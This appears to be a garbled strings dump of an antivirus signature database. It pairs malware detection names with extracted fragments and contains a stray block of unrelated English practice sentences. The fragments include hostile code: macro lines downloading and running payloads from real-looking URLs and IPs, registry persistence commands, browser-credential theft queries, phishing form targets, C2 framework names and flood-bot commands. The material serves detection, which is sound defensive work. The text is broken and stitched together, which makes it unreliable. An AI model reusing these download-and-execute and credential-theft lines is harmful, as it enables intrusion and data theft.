!Startpage.AEJ .k969.com P-ba4f-00a0c91eedba}\\Shell\\Start\\Command\\ ,\\iexplore.exe\" http:// lore.exe,-32528 L\\Desktop\\NameSpace\\{1f4de370-d627-11d1 $a}\\LocalizedString] !Hupigon.ZAI fUCK_AVP MyLive \\pbk\\rasphone.pbk \\perfc008.dat [%d/%d/%d %d:%d:%d] BITSServiceMain BITSServiceMainx MmM0bV1uKjhdTTQ3ZXM1PD5Anw==@3QLz4PEC/vMCvQP7+58= HAHHHH MmM0bV1uKjhdTTQ3ZXM1PD5Anw==@3QLz4PEC/vMCvQP7+58=HAHHHH SOFTWARE\\mICRosOFT\\wINDoWs nt\\cURrENTvERsIoN\\sVcHosT %s:\\DoCumEnts And SetTinGs\\LocalSeRVice %s\\%d_Index.TEMP %s\\%d_Index.TEMP] !Hupigon.ZAJ \\teslortnoctnerruc\\ \\server.exe 36%xsvc 36%xsvc] !Hupigon.ZAK Xmfy] TQ*zR 0etVolumeInformation GT_Update \tGT_Update \\Gh0st %d \t\\Gh0st %d %s:\\Documents ONS\\IExPLoRE.EXE\\SHelL\\ ONS\\IExPLoRE.EXE\\SHelL\\] !Agent.ABGI uRfNR Zg&uRfNR !Boaxxe.L !Delf.CO KeySpyXP KeyWord.Scroll_Lock {NUMPAD DIVIDE} DJ Mentos Motyl.exe Motyl.exe] Ransom:Win32/LockScreen.AS /c REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v Userinit /t REG_SZ /d \"C:\\WINDOWS\\system32\\userinit.exe,C:\\Documents and Settings\\Administrator\\ 0-9.EXE\" /f !Small.DJ $lsass.exe Fail To create Snap Shot $lsass.exeFail To create Snap Shot Is GodMode: Fail Error! root$ !Delf.KM !GameHack.C .+:\\\\.+\\\\Desktop\\\\Yeni Klas.+\\\\Project1.vbp 1,.+:\\\\.+\\\\Desktop\\\\Yeni Klas.+\\\\Project1.vbp !CeeInject.gen!DY !Sinowal.AHD !Pinkblocker.gen!A $0 *0 !VB.CR !VB.CR[@ !VB.LU createobject(\"winhttp.winhttprequest Xcreateobject(\"winhttp.winhttprequest _.open\"get\", _g/\"&\"c3\"&\"s7\"&\"z\",false _execute Keylogger.HB!bit watchwinsp.org/v2.txt shutdown /s /t 0 sendActiveEmail sendActiveEmail] VirTool:Win64/Drixed!rfn Puwin.A TrojanDownloader:PowerShell/Cobelatt $TrojanDownloader:PowerShell/Cobelatt tvpbulv\"+\"iievigewgaaaasi0d6v///0ibwzblaqd/00ijw0mj+ggeaaaawv/qqbjwtajwaauaaaba/9ma8aaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaaawg2zrunocufj6arhsegk4o7znuhz6arijvmy4khocuko8z7hyegk4njtqump6arhbapg4xxocufj6a7idegk4njtmuhj6arg0lmi4u3ocudsuy7htegk4njtoufn6arhsawnounocuaaaaaaaaaaaueuaagsgbgboptxxaaaaaaaaaadwacigcwilaabiagaasaiaaaaaaac Gendwnurl.BE!bit jbdsicoio http://img-save.xyz HKEY_CURRENT_USER\\Software\\Classes\\steam\\Shell\\Open\\Command] Gendwnurl.BJ!bit http://47.89.187.54 .rar C:\\TEMP /k DownloadFile] Gendwnurl.BK!bit http://ckpetchem.com entrypoint invoke !Tinba.H!bit 83\":f6 !SpyEyes !Cowmf.A !VBCrypt.A Virus:Win64/Expiro.EN!bit QRGUJ AUAVAWH !Zuepan.A application/xhtml+xml %s%08x.%s /c start \"\" \"%s\" 88C3D173715405943DF9AA0DA0C9893B BD75476FE8B74F9F2EF73E9128F946F5 !Jscrpt.A!bit !Farfli.PN!bit TCPConnectFloodThread.target http://119.249.54.113/ HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0] !Swotter.A!bit !Swotter.A!bitD@ k<-OrZ NDXag S(iKOrZ S~,`| vwM@x oe Wb~ !CeeInject.RT!bit That plumber lent her a lot of money Joe struck him a heavy blow That guard sold him a ticket That journalist showed them a photograph That carpenter struck him a heavy blow Lesters ex-wife orders her a new hat Willie bought her a gift Jackie strikes him a heavy blow Stephen struck him a heavy blow Those police officers offered her a ride home That student saved her a seat Betty gives him a magazine Ed ordered her a new dress Abraham gives him a magazine Those scientists told her the shortest way Miss Johnson envied him his good fortune That janitor shows them a picture Abraham brought her a small present Debbie taught them English Ned sends him a package Those taxi drivers make him some coffee That manager read the children a story That teacher wrote her a letter Albert lends him a pencil Ann Lynn sent him a package Willie bought her a gift Joannes mother offers her a bribe Those science teachers buy her a gift Joannes mother offers her a bribe Those science teachers buy her a gift] !Skeeyah.A.bit I\tNLGB !CeeInject.SB!bit !Kryptik.FZTF ;* 'C !Azden.A !Kuiper !WebOpen.A !Totecx Ransom:Win32/Crypren Trojan:O97M/Bailiwick.B CoinSteal.A!bit bytecoinwallet.wallet CryptoService.pdb dsciuyizhiuuc.php?type=] !Kasidet.G!bit Xl5jVVxcVWIx CoinMiner.KA!bit !CoinMiner.OS!bit !Turla 2-'1Y !VBRan Ransom:MSIL/WannaPeace.A C}+x{ !Pynamer.B!ac ]a eg Jw# !Pynamer.A!ac % G+r 6 {l> ** *M'*^Y RUxp IqV :pqK= Y.+uO V1r-28 |zO-0 nqbhg /H (z\" /H [4 ' GvU h> rZ 10feW !Plimrost fileinstall(\"encrypted.data\",@tempdir&\"\\ 0\",1)$ =fileread(@tempdir&\"\\ 0\")global$ P=_base64decode($ ,\"\",@scriptfullpath) TrojanDownloader:PowerShell/Falsip.B $TrojanDownloader:PowerShell/Falsip.B !Schopets.O Nscript:Type_vbs&(SCPT:VBS/Obfuscator.Split.Adodb.A|SCPT:VBS/Obfuscator.Split.FileSystemObject.A|SCPT:TrojanDownloader:VBS/Schopets!SaveToFile)&(SCPT:VBS/Obfuscator.Reverse.ResponseBody|SCPT:Schopets!ReverseHttp|SCPT:Schopets!ReverseXmlHttp|SCPT:Schopets!ReverseAdodbStream|SCPT:Schopets!ReverseWscriptShell)] !Schopets.OB InEmail&AGGR:SingleVBSInArchive&Nscript:Type_vbs&(SCPT:VBS/Obfuscator.Split.Adodb.A|SCPT:VBS/Obfuscator.Split.FileSystemObject.A|SCPT:TrojanDownloader:VBS/Schopets!SaveToFile|SCPT:VBS/Obfuscator.Reverse.ResponseBody|SCPT:Schopets!ReverseHttp|SCPT:Schopets!ReverseXmlHttp|SCPT:Schopets!ReverseAdodbStream|SCPT:VBS!Obfuscator.Split.CmdExe)] CoinSteal.B!bit VictimLogs BitcoinWallet SendUrlAndExecute get_Screenshot get_Screenshot] Nekozillot.A!bit \\AppData\\Local\\Amigo\\User Data\\Default\\History http://zillot.kz/System/mysql/users.php regsetauto RisingForce2] SupportScam:MSIL/Payreen.A Q F/] 3\tN@U Q F/] Q F/] Trojan:Win64/CoinMiner.OT!bit !Gendelfan.F!bit Trojan:Win64/Wdfload.M!bit CoinMiner.OU! Elkcro.A Erebus Final Final\t@ Firhel.A Flood.AU Flood.BR Flood.C Flood.DH Flood.E Flood.F Flood.G Flood.I Flood.P Flood.T Flood.V Flood.W Flood.X +0UOu Froze Girc.17 Girc_181.A Goodbot Grimgram Hetrad Iblis Iland.A Informa.A InSpic Iover.A Iroffer Jerret.A Jerret.D Judge sockwrite-nsockcloneprivmsg%jd.dachan:3,1doneudpflooding$2 <sockwrite-nsockcloneprivmsg%jd.dachan:3,1doneudpflooding$2 Karmahotel Lambot.A Lamebot Menak Mesut Mimic Mimic.C Mimic.E Mimic.F n2=msdossettings.inin3=fatsys.inin4=namesserver.ini 5n2=msdossettings.inin3=fatsys.inin4=namesserver.ini r4ndom.server{return$gettok(irc.nitro.net:irc.dal.net:irc.austnet.org:irc.webchat.org:irc.infatech.net,$rand(1,5),58)} xr4ndom.server{return$gettok(irc.nitro.net:irc.dal.net:irc.austnet.org:irc.webchat.org:irc.infatech.net,$rand(1,5),58)} Mircer.A Momma Momma.A Momma.A\t@ ={Quu ={Quu( Momma.C //run$mircdir$+winsok .sockwrite-ndlgethttp://$+%usite2$+/$+%fileini 0.sockwrite-ndlgethttp://$+%usite2$+/$+%fileini Momma.D , ^B|7 Movie.A Moyt.A Moyt.B Mutin.A Muzik Niqim Noclose n0=/join#![0wn3d$chr(36)$+nulln1=/timer060/join#![0wn3d$chr(36)$+null Gn0=/join#![0wn3d$chr(36)$+nulln1=/timer060/join#![0wn3d$chr(36)$+null {?<D] PPack Randon.AE Randon.L Randon.S Regie.A Reklam.A Reklam.C Reklam.D Reklam.E Reklam.F Reklam.I Sensi.11 Shiznat.C Sipg.A Slowdown Smev.B Speed.A Tawb.A Temper Thea.A Thorin.11932 Tkbot Trilissa.J Tzet.A Upaga Whisper.A AAssign 0oUOo AAssign.A ABizex.A ABlast.A ABomgen.B ]5JW ABomgen.C ABomgen.D ABomgen.E ABomgen.P AChango ACobase.A AConcon tYg&`i ADavinia ADriveFormat.A ADropperAppl.A AFakehost AFofiv.A AGhostdog.A AHTADropper.A AIestart.E AInformer AInor AInor.AR AInor.BB AInor.BE AInor.BL CIwillbased AKillfiles.B ALooper.B ALooper.D AMarfan.A AMimail.R ANyrobot.A AObjdata AParams.D APaula APsyme.N ARapa AResizer.A ARunner.A ASeeker.C AShowhelp.A ASmall ASmall$@ I1(C\t `sg&| Gx1wbJPv ASmall.A ASmall.D ASmall.F ASpthgen AStartpage.F ATalkStocks.A AVBSWG.C AVoodoo.A AVoodoo.C AWhitehome AWindowbomb.C AWipe.A AZivaExploit Trojan:ABAP/Cadabra DoS:ABAP/Delan.A Trojan:ABAP/Delins.A Worm:ABAP/Rapid.A Backdoor:ABAP/Rivpas.D !SerialThief Virus:ALisp/Pobresito.A Virus:ALisp/Bursted.A Virus:AmiPro/Amiv Trojan:ANSI/Bart Trojan:ANSI/Spehelp Monster.6109 Backdoor:ASP/Ace.B Backdoor:ASP/Ace.C Backdoor:ASP/Ace.D Backdoor:ASP/Ace.F TrojanDropper:ASP/Cobase Backdoor:ASP/Sql Backdoor:ASP/Uxor.A Trojan:ASX/Conp SillyTroj Worm:BAS/Alba Trojan:BAS/Alpha.A Virus:BAS/Bv3 * TrojanDropper:BAS/Clobus.A Worm:BAS/Craytron Worm:BAS/Junkrem Worm:BAS/Trash.A Virus:BAS/Xyc * Trojan:CorelScript/CST.A Virus:CorelScript/CSV.A Trojan:CorelScript/PVT.A !IISCmd Block Block.A Trojan:HC/BangSpice.A Trojan:HC/HC_9603.A Trojan:HC/MerryXmas.A Backdoor:HE/Flys.A Trojan:HE/Flys.B Exploit:HTA/Behind.A Exploit:HTA/Showhelp Exploit:HTA/Wareme.A Virus:HTML/Abbum.A Exploit:HTML/Ability Trojan:HTML/Alcaul.F Worm:HTML/Alcaul.M Worm:HTML/Alcaul.Q Exploit:HTML/AnyMail TrojanDownloader:HTML/Balder.A TrojanSpy:HTML/Bayfraud.A Virus:HTML/Blowup Trojan:HTML/Briss.A Trojan:HTML/ByteVerify.A Trojan:HTML/CardStealer Trojan:HTML/Citifraud.A TrojanSpy:HTML/Citifraud.I = Asc(Mid( Mod Len( + Sheet2.Range( + CStr( )).Value , \".\") , \"::\") = ThisWorkbook.Name Print #1, = \"\"] !Bynoco!lnk Exploit:Win64/Revsell.A cmd.exe%s%s Ransom:Win32/Maze.Q!MSR Killyourself.dll wchCrypt32 dwShellCodeSize TrojanDownloader:AndroidOS/Banker!MSR %TrojanDownloader:AndroidOS/Banker!MSR TrojanSpy:AndroidOS/Fakecop!MSR Exploit:AndroidOS/Lotoor.A!rfn !Keylogger.AA!MSR !Downloader.AU!rfn TrojanDownloader:O97M/Obfuse.AA!MTB #TrojanDownloader:O97M/Obfuse.AA!MTB = CreateObject(\"Scripting.FileSystemObject\") Wicmd.CreateFolder \"C:\\pic1\\\" = \"C:\\pic1\\Build16.cmd\" \"start c:\\pic1\\ PreviewPreview2.exe\" TrojanDownloader:PowerShell/Elshutilo.AJ!MTB ,TrojanDownloader:PowerShell/Elshutilo.AJ!MTB Replace(f1, \"/\\\", \"2\")) Replace(\"Pow#&*$%ell\", \"#&*$%\", \"ersh\")) Application.ExecuteExcel4Macro ( + \"\"\"\" + + \"\"\"\" + \", \" + \"\"\"\" + + \"\"\"\" + \", \"\"\"\", 0)\") TrojanDownloader:PowerShell/Elshutilo.PS!MTB ,TrojanDownloader:PowerShell/Elshutilo.PS!MTB Dim si As STARTUPINFO Ret3 = Environ$(\"APPDATA\") + \"\\pay1.ps1\" Ret2 = URLDownloadToFileA(0, \"http://kredytinksao.pl/raw.txt\", Ret3, 0, 0) Ret2 = URLDownloadToFileA(0, \"http://wpr.mko.waw.pl/uploads/scheduler.txt\", Ret3, 0, 0) Ret7 = CreateFileA(Ret3, 1, 2, sa, 3, 0, 0) Ret = CreateProcessA(vbNullString, Ret9, ByVal 0&, ByVal 0&, True, 32, ByVal 0&, vbNullString, si, pi) Ret = CreateProcessA(vbNullString, Ret9, ByVal 0&, ByVal 0&, True, 32, ByVal 0&, vbNullString, si, pi)] !CryptInject.SK!MTB 307835333734373236393645363735323635373636353732373336353238323436343239 30783434364336433533373437323735363337343433373236353631373436353238323236323739373436353230 0x40486f6d654472697665202620225c5c5c5c57696e646f77735c5c5c5c4d6963726f736f66742e4e45545c5c5c5c4672616d65776f726b5c5c5c5c ( $URL , $PATH ) = STRINGREPLACE ( ( $FILE , $STARTUP , $RES , $RUN = 3078343636393643363534463730363536453238 = \"WriteProcessMemory = STRINGREGEXPREPLACE ( $SITEM , \"^Row\\s\\d+\\|(.*)$\" , \"$1\" ) = STRINGREGEXPREPLACE ( $SITEM , \"^Row\\s\\d+\\|(.*)$\" , \"$1\" )] !Delpem.A!cry SIGATTR:DelphiFile&HSTR:DelphiPacker.A] *&SIGATTR:DelphiFile&HSTR:DelphiPacker.A] Empyre.D!MTB TrojanDownloader:O97M/Obfuse.LHO!MTB $TrojanDownloader:O97M/Obfuse.LHO!MTB TrojanDownloader:O97M/Obfus.B!MTB !TrojanDownloader:O97M/Obfus.B!MTB (\"wscript //nologo c:\\Colorfonts32\\visitcard.vbs @ c:\\Colorfonts32\\secpi15.exe start c:\\Colorfonts32\\secpi15.exe LoadScriptVBS GetObject(HashTable()), \"c:\\Colorfonts32\\B4D9D02119.cmd\", 0 LoadScriptVBS GetObject(HashTable()), \"c:\\Colorfonts32\\B4D9D02119.cmd\", 0] TrojanDownloader:O97M/Macrobe.BD!MTB $TrojanDownloader:O97M/Macrobe.BD!MTB cvcviagens.sslblindado.com/ htahtml\" var0 = \"MSHTA https:// :var0 = \"MSHTA https:// Shell (Var) Shell (Var)] Trojan:HTML/Phish.L!MTB tmss-ict.com/include/result.php\"> Itmss-ict.com/include/result.php\"> <formmethod=\"post\"action=\"https:// C<formmethod=\"post\"action=\"https:// ARedirector.BD!MTB a-z=0; a-z.length; 0-9;if(( a-z)==true)&&( 0-9)&&( )==false)){ a-z=eval( !MemoryInjection.A!MTB !Pydcrypter.A!MTB AKoadicPersist.A case0x80000001 ;case0x80000001 k0adic 0regdelete p%appdata%\\\\ .hta\" Trojan:Python/Febrev.A importmarshal cs=s@*ket.s@*ket(s@*ket.af_inet,s@*ket.sock_stream) gs.re*v(2048) kw?n32.^rz2 ire]zy=@]en(\\'w?n32.^rz\\',\\'r+\\') n*urrent_q?r=(@s.!et*wq()) urrent_user+*urrent_q?r !Splinter.A!MTB sliverpb.NetInterface sliverpb.WGSocksServer sliverpb.PortfwdProtocol sliverpb.WGTCPForwarder .sliverpb.RegistryType .sliverpb.RegistryTypex sliverpb.Register.ActiveC2 sliverpb.KillSessionReq sliverpb.Register.PidPid sliverpb.IfconfigReq sliverpb.TerminateReq sliverpb.NetInterfaces sliverpb.NetInterfacesx /xc/load.go main.bake syscall/zsyscall_windows.go *sliverpb.Process *sliverpb. Info *sliverpb.Migrate *sliverpb.Elevate *sliverpb.Kill *sliverpb.DNSPoll *sliverpb.DNSBlockHeader *sliverpb.ExecuteAssemblyReq *sliverpb.ImpersonateReq *sliverpb.ImpersonateReqxz ).GetPid ).GetFilename ).GetActiveC2 ).GetVersion ).GetReconnectInterval ).GetProxyURL ).GetExecutable ).GetOwner ).GetSessionID ).GetCmdLine ).GetTargetLocation ).GetReferenceDLL ).GetTargetDLL ).GetProfileName ).GetUsername ).GetPassword ).GetDomain ).GetRequest ).GetProcessName ).GetArgs ).GetEntryPoint ).GetKill ).GetRemoteAddr ).GetSkState ).GetUID ).GetProcess ).GetEnablePTY ).GetTunnelID ).GetResponse ).GetNetInterfaces ).Reset ).String ).GetHostname ).GetPort ).GetCommand !ExecScpt!MSR Trojan:Win64/VMProtect!MSR !Obfuse.J!MTB AFaceliker.AM!MTB TrojanDownloader:O97M/Obfuse.RS!MTB #TrojanDownloader:O97M/Obfuse.RS!MTB = ts(\" ;quui()fmjGebpmoxpE/*uofjmDcfX/ufO!udfkcP.xfO)##!eobnnpD.!mmfitsfxpq\") ' R !U0!Z!E0!O0!Z!D0!fdjpid!D0!fyf/end]34nfutzT]txpeojX];D\") & ts(\"*(f(!,!(yf/o(!,!(ph(!,!(pmo(!,!(jx]sjeq(!,!(nu](!,!(djm(!,!(cv(!,!(Q]t(!,!(sft(!,!(V](!,!(;D(!-(\") Put #1, , ts(\"##sjeqnu]djmcvQ]tsftV];D##!sjeln!d0!end\") Put #1, , ts(\"##sjeqnu]djmcvQ]tsftV];D##!sjeln!d0!end\")] TrojanDownloader:O97M/Obfuse.RV!MTB #TrojanDownloader:O97M/Obfuse.RV!MTB Nvrerc = Replace( \", \".\" & & \"js\" & & \"e\") Name As Nvrerc Gjurv_tr Application.StartupPath, \"\\.\" & \".\\.\" & \".\\..\\\" = \"\" & \"ru\" & \"\" & \"n\" & \"sh\" & & \"e\" & & \"l\" & \"l\" PWS:HTML/Phish.J!MTB @ F#?Qw Trojan:HTML/Phish.RV!MTB Trojan:HTML/Phish.RV!MTB%@ method=\"post\"action=\"http://cpanel.asimsrl.com/ifk/cat.php <method=\"post\"action=\"http://cpanel.asimsrl.com/ifk/cat.php r:n# v Wrg Getshell.B!MTB Ransom:Win32/Phobos.PA!MTB D$$PSj D$$PSjj !Obfus!MTB !Lokibot.PA!!Lokibot.gen!SD /fre.php %s\\Cyberduck \\QupZilla\\profiles\\default\\browsedata.db %s\\%s\\User Data\\Default\\Login Data SELECT encryptedUsername, encryptedPassword, formSubmitURL, hostname FROM moz_logins %s\\FossaMail\\profiles.ini %s\\Foxmail\\mail %s\\NETGATE\\Black Hawk %s\\NETGATE\\Black Hawk] !Autorun!MSR Empire.A @l(#T AMeterpreter!MSR HackTool:PowerShell/DllInject !Emotet.DCE!MSR !FormBook.U!MTB jAHxB6aic2yPK95MpS6x5gUm315 kdqF0DZF6125 EtCes0mfY2QoX35YAnKh0mn0cSPU09Z34] !FormBook.V!MTB Kdr2T71LBy9gHHHZEFyk73hGH84 fHsx74CpJPOGAx8D7Va87Lt1iSnSiu0VIPugzUyj170 Tp546gnRXdgjufwH77JNTSB4JFs4fR1esloL49oS188] !FormBook.W!MTB Fbm5KcKLqiiT2N36caGe0oiMvDuHr4Lo57Y2zIg147 CbcEKmg1elifRN6uqpv13 WDDBhbETAWALhgGsoAZ1CnlQAnXxkZQV61Vun207] !FormBook.Y!MTB !Fareit.SN!MTB !GameTool!MSR Behavior:Win32/OctProcMitigationFlags.A .'Behavior:Win32/OctProcMitigationFlags.A L@\"mitigationflags: K@\"mitigationflags: Behavior:Win32/OctProcSignatureLevel.A .&Behavior:Win32/OctProcSignatureLevel.A L@ signaturelevel: K@ signaturelevel: Behavior:Win32/RDPSuspTool.A @ e- @ e- @ e- @ e- @ e- @ e- @ e- @ e- !\\~@@ @ e- @ e- @ e- @ e- @ e- @ e- @ e- @ e- @ e- @ e- @ e- pY_6Y@@ @ e- @ e- @ e- @ e- @ e- @ e- @ e- @ e- @ e- phvG3@@ @ e- TrojanDownloader:O97M/Donoff.DA!MTB #TrojanDownloader:O97M/Donoff.DA!MTB TrojanDownloader:O97M/Donoff.QF!MSR #TrojanDownloader:O97M/Donoff.QF!MSR Xxxwsxcxrixptx xx X/ex:xxxxXJxSCrxipxtx x\"\"x%x~xfxX0x Environ( DATA Trojan:O97M/EICAR_Test_File.KA!MSR \"Trojan:O97M/EICAR_Test_File.KA!MSR eicarPart1 = \"X5O!P%@AP[4\\PZX54(P^)7C\" &eicarPart1 = \"X5O!P%@AP[4\\PZX54(P^)7C\" eicarPart2 = \"C)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*\" <eicarPart2 = \"C)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*\" eicarPart1 + eicarPart2 eicarPart1 + eicarPart2] Injector.AR!MTB r`J{.Z AgentTesla.MPJ!MTB Bladabindi.MPJ!MTB AgentTesla.KKH!MTB Empyre.E!MTB !Predator.PVS!MTB F;t$D| !IcedID.KDS!MTB !IStartSurf.KDS!MTB !Azorult.PVD!MTB TrojanDownloader:SWF/Esaprof!MSR TrojanDownloader:SWF/Esaprof!MSR !VBObfus.V!MTB !Rbot.V!MTB !Appis.V!MTB TrojanDownloader:O97M/Obfuse.SJ!MTB #TrojanDownloader:O97M/Obfuse.SJ!MTB = \"https:// %/lsass.exe\" l = ActiveDocument.Path + \"\\lsass.exe\" = CreateObject(\"Microsoft.XMLHTTP\") Open \"GET\", , False 'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox Worksheets(1).Activate = Range( ).Comment.Text = StrReverse(Range( ).Comment.Text) .Exec (StrReverse( GameHack!MSR !U<0nh FormBook.X!MTB FormBook.Z!MTB !Emotet.DCD!MTB !Emotet.DCE!MTB !Filecoder.AA!MSR !Filecoder.AB!MSR B'~o_ !Filecoder.AC!MSR jw3y= !Filecoder.AD!MSR E58nb] !Filecoder.AE!MSR !CryptInject.SL!MSR Sufnoc.E Masdecr.A Ozwer.C Simpan.B Dest.F Thus.AE Virus:WM/Colors.AX #>+l] Virus:WM/Johnny.A1 Virus:WM/Wazzu.CIM Virus:WM/Alliance.A Virus:WM/Rats.A Virus:WM/Archie.A Virus:WM/Atom.C Virus:WM/Atom.E Virus:WM/Atom.F Virus:WM/Bandung.A Virus:WM/BlackEnd Virus:WM/Boom.A Virus:WM/Buero.A @;G+] Virus:WM/Colors.A #>+lWV #>+lWVV] Virus:WM/Colors.B Virus:WM/Colors.J Virus:WM/Concept.L Virus:WM/Concept.H Virus:WM/Concept.M Virus:WM/Concept.U Virus:WM/Spiral.A Virus:WM/Concept.B _i3>P' Virus:WM/Concept.S Virus:WM/Concept.T Virus:WM/Daniel.B 8hL'.] Virus:WM/Darkside.A Virus:WM/Date.A Virus:WM/Divina.A Virus:XM/DMV.A Virus:WM/Hellgate.A Virus:WM/Doggie.A Virus:WM/Easy.A Virus:WM/Epidemic.A Virus:WM/Friendly.A &_O;J Virus:WM/Fury.A Virus:WM/Guess.A Virus:WM/Concept.D .oV7] Virus:WM/Hassle.A $.t\"! Virus:WM/Helper.A Virus:WM/Hot.A Virus:WM/Irish.A Virus:WM/Italian.A Virus:WM/Killdll.A Virus:WM/Twno.B Virus:WM/MadDog.B Virus:WM/MDMA.A Virus:WM/Minimal.B Virus:WM/Paper.A Virus:WM/Niki.A Virus:WM/Nop.A Virus:WM/Nop.D Virus:WM/Npad.C Virus:WM/Nuclear.A Virus:WM/Nuclear.B Virus:WM/Showoff.A Virus:WM/Pheeew.A Virus:WM/Polite.A Virus:WM/Rapi.A Virus:WM/Satanic.A Virus:WM/Smiley.A Virus:WM/Spooky.A Virus:WM/Stryx.A Virus:WM/NJ_WMVCK2.T Virus:WM/NJ.WMVCK Virus:WM/MVDK * Virus:WM/FormatC Virus:WM/Twister.A Virus:WM/Twno.A Virus:WM/Twno.D Virus:WM/Tk.A * C)\tk- Virus:WM/Kompu.A Virus:WM/Phardera.B Virus:WM/Phardera.C Virus:WM/Puritan Virus:WM/Random.A Virus:WM/Twno.E Virus:WM/Twno.F Virus:WM/TwoLines.A <3Wj Virus:WM/Xenixos.A Virus:WM/Wazzu.AB Virus:WM/Wazzu.AE Virus:WM/Wazzu.AS Virus:WM/Wazzu.B i uC\t Virus:WM/Wazzu.F Virus:WM/Wazzu.L Virus:WM/Wazzu.Y Virus:WM/Wazzu.Z Virus:WM/Wazzu.D Virus:WM/Wazzu.I Virus:WM/Wazzu.AT Virus:WM/Wazzu.Q Virus:WM/Wazzu.X ; )C\t Virus:WM/Outlaw.A Virus:WM/Outlaw.B Virus:WM/Outlaw.C Virus:WM/Wazzu.C Virus:WM/Wazzu.AZ Virus:WM/Wazzu.BF Virus:WM/Wazzu.BJ Virus:WM/Attention.A Virus:WM/Wazzu.M Virus:WM/Wazzu.S Virus:WM/Wazzu.U Virus:WM/Wazzu.T Virus:WM/Colors.L Virus:WM/Concept.R Virus:WM/Concept.X Virus:WM/MWDK.B Virus:WM/NJ_MVDK_Black.A Virus:WM/Doggie.D Virus:WM/Gangsterz.A Virus:WM/Kerrang.A Virus:WM/Target.B Virus:WM/Lunch.B Virus:WM/Magnum.A Virus:WM/NJ_WMDLK!Grunt Virus:WM/Phardera.E Virus:WM/Minimal.A Virus:WM/Abc.A Virus:WM/Atom.B Virus:WM/Atom.D Virus:WM/Clock.A Virus:WM/Concept.C Virus:WM/Concept.E Virus:WM/Concept.F Virus:WM/Concept.G ]0H4C Virus:WM/Concept.I Virus:WM/Concept.J Virus:WM/Concept.K Virus:WM/Concept.N Virus:WM/CountTen.A Virus:WM/Daniel.A Virus:WM/Dietzel.A EH\t] Virus:WM/Divina.C Virus:XM/DMV.B Virus:WM/FutureNot.A Virus:WM/Concept.AG Virus:WM/Goldfish.A Virus:WM/Johnny.A Virus:WM/Lunch.A Virus:WM/MadDog.A Virus:WM/MDMA.C Virus:WM/MDMA.D Virus:WM/NiceDay.A Virus:WM/Npad.B Virus:WM/Nuclear.C Virus:WM/Nuclear.E Virus:WM/Showoff.R Virus:WM/Tedious.A Virus:WM/Wazzu.A Virus:WM/Mercy.A Virus:WM/Showoff.G Virus:WM/Doggie.C Virus:WM/Doggie.E Virus:WM/Eraser.E Virus:WM/Imposter.B Virus:WM/Look.A Virus:WM/Olympic.A Virus:WM/Weather.A Virus:WM/Minimal.G Virus:WM/Minimal.H Virus:WM/Balu.A1 Virus:WM/Mercy.B Virus:WM/CVCK_Chicken.A ^ag] Virus:WM/NJ_WMDLK.F Virus:WM/Olympic.B Virus:WM/Rapi.B Virus:WM/Reflex.A Virus:WM/Talon.A Virus:WM/Twno.C Virus:WM/Talon.B Virus:WM/Talon.C Virus:WM/Talon.D Virus:WM/Talon.F Virus:WM/Talon.G Virus:WM/Helper.C Virus:WM/Helper.D Virus:WM/Helper.E Virus:WM/Darkside.C Virus:WM/Wazzu.AN Virus:WM/Wazzu.J Virus:WM/Wazzu.CF Virus:WM/Andry.A Virus:WM/Atom.J Virus:WM/Darkside.D Virus:WM/Dzt.A |@%C Virus:WM/Eraser.M Virus:WM/Hunter.A Virus:WM/Talon.E 54v|YkH Virus:WM/TwoLines.A1 XZ1k] Virus:WM/Talon.H Virus:WM/Swlabs23 Virus:WM/Wazzu.CG Virus:WM/Lazy.A Virus:WM/Eraser.H Virus:WM/Darkside.B Virus:WM/Eraser.F ;#hIBR Virus:WM/Helper.I Virus:WM/Minimal.D Virus:WM/Mota.A Virus:WM/Simple.A.intd Virus:WM/Swlabs.A Virus:WM/Armadillo.A Virus:WM/Terror.A.intd JU-c launchctl load -w @/library/launchagents/com.adobe.macromedia.flash.plist -c chmod +x @/.flashupdatecheck JU-c chmod +x Exploit:O97M/CVE-2017-8570.PP!MTB !Exploit:O97M/CVE-2017-8570.PP!MTB VirTool:PowerShell/PsObfus.gen!B \" VirTool:PowerShell/PsObfus.gen!B SLF:PowerShell/Empire!obfus&SCRIPT:Empire.Xor&SCRIPT:InvokeObfus&(Lua:CMDExt|Lua:BATExt) \\XSLF:PowerShell/Empire!obfus&SCRIPT:Empire.Xor&SCRIPT:InvokeObfus&(Lua:CMDExt|Lua:BATExt) SLF:PowerShell/Empire!obfus&SCRIPT:Empire.Xor&SCRIPT:InvokeObfus&MpIsPowerShellAMSIScan&(Lua:IsEnterprise|IsSeville)] xtSLF:PowerShell/Empire!obfus&SCRIPT:Empire.Xor&SCRIPT:InvokeObfus&MpIsPowerShellAMSIScan&(Lua:IsEnterprise|IsSeville)] Exploit:O97M/CVE-2017-8570.AV!MTB !Exploit:O97M/CVE-2017-8570.AV!MTB TrojanDownloader:O97M/Donoff.MXSS!MTB %TrojanDownloader:O97M/Donoff.MXSS!MTB Application.ScreenUpdating = False (\"4d6963726f736f\") & (\"66742e584d4c48545450\")) (\"41646f64622e53747265\") & (\"616d\")) (\"474554\"), (\"687474703a2f2f33372e3539\") & (\"2e3136302e3134372f76657273696f6e5f342e657865\"), False = Environ(\"AppData\") (\"5c31\") & (\"333069676a74342e657865\")) Chr$(Val(\"&H\" & Mid$( write .responseBody savetofile (\"5c31333069676a74342e65\") & (\"7865\"), 2 TrojanDropper:AndroidOS/Wroba.A!MTB %#TrojanDropper:AndroidOS/Wroba.A!MTB E:?d Exploit:O97M/CVE-2017-11882.MXRR!MTB $Exploit:O97M/CVE-2017-11882.MXRR!MTB Exploit:O97M/CVE-2017-11882.MXRI!MTB $Exploit:O97M/CVE-2017-11882.MXRI!MTB Exploit:O97M/CVE-2017-11882.MXRL!MTB $Exploit:O97M/CVE-2017-11882.MXRL!MTB Exploit:O97M/CVE-2017-11882.MXRO!MTB $Exploit:O97M/CVE-2017-11882.MXRO!MTB Stelega.DF!MTB $542cab06-bc48-4594-9fb8-3926ed31a294 $06eee637-d14e-4d4e-b3d5-18f38a1d521a Audio_Realtek_Drive.Resources.resources 